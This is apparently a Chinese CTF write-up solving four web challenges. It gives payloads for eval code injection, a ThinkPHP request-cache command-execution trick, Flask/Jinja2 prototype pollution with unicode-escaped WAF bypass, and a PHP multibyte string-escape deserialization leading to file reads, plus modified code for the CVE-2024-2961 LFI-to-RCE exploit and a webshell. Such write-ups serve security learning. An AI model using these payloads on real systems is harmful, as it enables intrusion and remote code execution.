目录
CodeInject
tpdoor
easy_polluted
Ezzz_php
CodeInject
eval里打代码注入
1=1);system("tac /0*");//
tpdoor
可以传参isCache给../../config/route.php写入$config['request_cache_key']
打的是CheckRequestCache中间件解析的漏洞
think\middleware\CheckRequestCache
是 ThinkPHP 框架中的一个中间件,作用是检查和处理请求的缓存。它的主要功能是在用户请求时检查是否有可用的缓存,如果缓存可用则直接返回缓存内容,从而避免重新处理请求,提升性能。
通过 file_put_contents() 函数动态地修改 route.php 文件中的缓存相关配置(如缓存键、过期时间等)。var_export() 确保 $config 数组可以被转换为合法的 PHP 代码并存储到文件中,以便下次项目运行时这些新的配置可以被加载和应用
Everything一搜都是
代审发现只要传入$key中含|即可任意代码执行
而$key是从$config['request_cache_key']中获取的
payload:
?isCache=cat%20/000*|system
执行后等一会,再次访问触发缓存机制
easy_polluted
/可以原型链污染,改掉app.secretkey之后访问/admin拿到flag
flag.html不是正常的渲染格式,所以也要污染掉模板字符串
用json.loads可以解析 Unicode 来绕过 waf
可以做一个小lab
import json# 包含 Unicode 编码的 JSON 字符串
json_data = '{"message": "Hello, \\u4e16\\u754c"}' # \\u4e16\\u754c 表示 "世界"# 使用 json.loads 解析
parsed_data = json.loads(json_data)# 输出解析结果
print(parsed_data["message"]) # 输出: Hello, 世界
注意bp发包的时候要把响应头Set-Cookie的内容复制到Cookie里
先污染jinja2模板字符串
{"__init__" : {"__globals__" : {"app" : {"jinja_env" :{
"variable_start_string" : "[#","variable_end_string":"#]"
} }}}
{"\u005f\u005f\u0069\u006e\u0069\u0074\u005f\u005f" : {"\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f" : {"\u0061\u0070\u0070" : {"\u006a\u0069\u006e\u006a\u0061\u005f\u0065\u006e\u0076" :{"\u0076\u0061\u0072\u0069\u0061\u0062\u006c\u0065\u005f\u0073\u0074\u0061\u0072\u0074\u005f\u0073\u0074\u0072\u0069\u006e\u0067":"[#","\u0076\u0061\u0072\u0069\u0061\u0062\u006c\u0065\u005f\u0065\u006e\u0064\u005f\u0073\u0074\u0072\u0069\u006e\u0067":"#]"
}}}}
}
再污染secretkey
{ "__init__" : { "__globals__" : { "app" : { "secret_key" :"Z3r4y"} } } }
{"\u005f\u005f\u0069\u006e\u0069\u0074\u005f\u005f" : {"\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f" : {"\u0061\u0070\u0070" : {"\u0073\u0065\u0063\u0072\u0065\u0074\u005f\u006b\u0065\u0079" :"Z3r4y"}}}
}
最后登录将username和password写进session
username=adminer&password=Z3r4y
带着响应头里的session访问/admin拿到flag
Ezzz_php
substrstr($data) 的作用是从输入的字符串 $data 中,提取第一个方括号 [ 和 ] 之间的内容
考的是mb_strpos与mb_substr结合的误用
建议是先本地搭一个测试用
<?php
highlight_file(__FILE__);
error_reporting(0);
function substrstr($data)
{$start = mb_strpos($data, "[");$end = mb_strpos($data, "]");return mb_substr($data, $start + 1, $end - 1 - $start);
}
class read_file{public $start;public $filename="/etc/passwd";public function __construct($start){$this->start=$start;}public function __destruct(){if($this->start == "gxngxngxn"){echo 'What you are reading is:'.file_get_contents($this->filename);}}
}
if(isset($_GET['start'])){$readfile = new read_file($_GET['start']);$read=isset($_GET['read'])?$_GET['read']:"I_want_to_Read_flag";if(preg_match("/\[|\]/i", $_GET['read'])){die("NONONO!!!");}$ctf = substrstr($read."[".serialize($readfile)."]");echo $ctf;
}else{echo "Start_Funny_CTF!!!";
}
可以看到正常输入就是直接截取到[]之间的内容
每传一个%9f就会往后'推'一个字符
每传一个%f0后面随便跟3个字符就会往前'拉'3个字符
这样就可以打字符串逃逸
注意在逃逸的时候需要添加一个%9f以此来抵消[]的影响,所以要比逃逸字符串数多个%9f
比如要逃逸Z3r4y,就需要6个%9f
生成要逃逸的字符串
<?php
class read_file{public $start;public $filename;
}$a=new read_file();
$a->start='gxngxngxn';
$a->filename='/etc/hosts';echo str_repeat('%9f',strlen(serialize($a))+1).serialize($a);
//%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9fO:9:"read_file":2:{s:5:"start";s:9:"gxngxngxn";s:8:"filename";s:10:"/etc/hosts";}
同时我们逃逸出的字符不能大于原来的字符数量,所以我们可以传参start来调整原字符的数量,以此逃逸出预期的字符
?start=aaaaaaaa&read=%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9fO:9:"read_file":2:{s:5:"start";s:9:"gxngxngxn";s:8:"filename";s:10:"/etc/hosts";}
发现可以任意文件读取了,但找不到flag
用CVE-2024-2961打LFI to RCE
CVE-2024-2961
cnext-exploits/cnext-exploit.py at main · ambionics/cnext-exploits · GitHub
修改一下send和download即可
def send(self, path: str) -> Response:"""Sends given `path` to the HTTP server. Returns the response."""payload_file = 'O:9:"read_file":2:{s:5:"start";s:9:"gxngxngxn";s:8:"filename";s:' + str(len(path)) + ':"' + path + '";}'payload = "%9f" * (len(payload_file) + 1) + payload_file.replace("+","%2b")filename_len = "a" * (len(path) + 10)url = self.url+f"?start={filename_len}&read={payload}"return self.session.get(url)def download(self, path: str) -> bytes:"""Returns the contents of a remote file."""path = f"php://filter/convert.base64-encode/resource={path}"response = self.send(path)data = response.re.search(b"What you are reading is:(.*)", flags=re.S).group(1)return base64.decode(data)
成功RCE写马
webshell拿flag